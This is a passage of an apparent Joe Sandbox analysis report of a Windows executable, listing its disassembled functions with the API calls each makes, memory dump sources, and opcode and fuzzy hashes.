                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: SysAnimate32
                                                                                                                                                                  • API String ID: 0-1011021900
                                                                                                                                                                  • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                                                                                                                  • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                                                                                                                                  • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                                                                                                                  • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                                                                                                                                  Function 004335CD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0043362B
                                                                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                                                                                                                                    • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                                                  • String ID: \
                                                                                                                                                                  • API String ID: 2267087916-2967466578
                                                                                                                                                                  • Opcode ID: c150a4e9996d72ab87fed94048e5703dbc8ac01b5d1c28e2aacddbc68f85fc9a
                                                                                                                                                                  • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                                                                                                                                  • Opcode Fuzzy Hash: c150a4e9996d72ab87fed94048e5703dbc8ac01b5d1c28e2aacddbc68f85fc9a
                                                                                                                                                                  • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                                                                                                                                  Function 0045D448 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 83COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                                                                                                                                  • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                                                                                                                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorMode$InformationVolume
                                                                                                                                                                  • String ID: %lu$\VH
                                                                                                                                                                  • API String ID: 2507767853-2432546070
                                                                                                                                                                  • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                                                                                                                  • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                                                                                                                                  • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                                                                                                                  • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                                                                                                                                  Function 00452AC7 Relevance: 7.8, APIs: 5, Instructions: 343COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                                                                                                                                  • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                                                                                                                                                                  • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                                                                                                                                  • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                                                                                                                                                                  Function 00462A31 Relevance: 7.7, APIs: 5, Instructions: 227COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                                                                                                                  • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                                                                                                                                  • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                                                                                                                  • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                                                                                                                                  Function 004757A7 Relevance: 7.7, APIs: 5, Instructions: 220COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                                                                                                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3488606520-0
                                                                                                                                                                  • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                                                                                                                  • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                                                                                                                                                  • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                                                                                                                  • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                                                                                                                                                  Function 0046D230 Relevance: 7.7, APIs: 5, Instructions: 170networkCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                                                                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastselect
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 215497628-0
                                                                                                                                                                  • Opcode ID: 6cdab619e7dca96a17f2fc959b6bce042922ade3eb27b56948d3af49321ce264
                                                                                                                                                                  • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                                                                                                                                  • Opcode Fuzzy Hash: 6cdab619e7dca96a17f2fc959b6bce042922ade3eb27b56948d3af49321ce264
                                                                                                                                                                  • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                                                                                                                                  Function 0046B4CF Relevance: 7.7, APIs: 5, Instructions: 157registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ConnectRegistry
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 76216097-0
                                                                                                                                                                  • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                                                                                                                  • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                                                                                                                                  • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                                                                                                                  • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                                                                                                                                                  Function 00464812 Relevance: 7.6, APIs: 5, Instructions: 145libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2449869053-0
                                                                                                                                                                  • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                                                                                                                  • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                                                                                                                                                  • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                                                                                                                  • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                                                                                                                                                  Function 00456391 Relevance: 7.6, APIs: 5, Instructions: 130keyboardCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 004563A6
                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                                                                                                  • GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                                                                                                  • GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3539004672-0
                                                                                                                                                                  • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                                                                                                                  • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                                                                                                                                                  • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                                                                                                                  • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                                                                                                                                                  Function 0047D40F Relevance: 7.6, APIs: 5, Instructions: 120sleepCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                                                                                                                                  • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                                                                                                                                  • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                                                                                                                                  • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 327565842-0
                                                                                                                                                                  • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                                                                                                                  • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                                                                                                                                  • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                                                                                                                  • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                                                                                                                                                  Function 0045C3C1 Relevance: 7.6, APIs: 5, Instructions: 118COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                                                                                                                                  • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                                                                                                                                  • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2832842796-0
                                                                                                                                                                  • Opcode ID: 6977aaa8d418497da5d790c089433aad42042d8112de828a40e3df56c6de2bfb
                                                                                                                                                                  • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                                                                                                                                                  • Opcode Fuzzy Hash: 6977aaa8d418497da5d790c089433aad42042d8112de828a40e3df56c6de2bfb
                                                                                                                                                                  • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                                                                                                                                                  Function 00441C7B Relevance: 7.6, APIs: 5, Instructions: 108registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                                                                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                                                                                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Enum$CloseDeleteOpen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2095303065-0
                                                                                                                                                                  • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                                                                                                                  • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
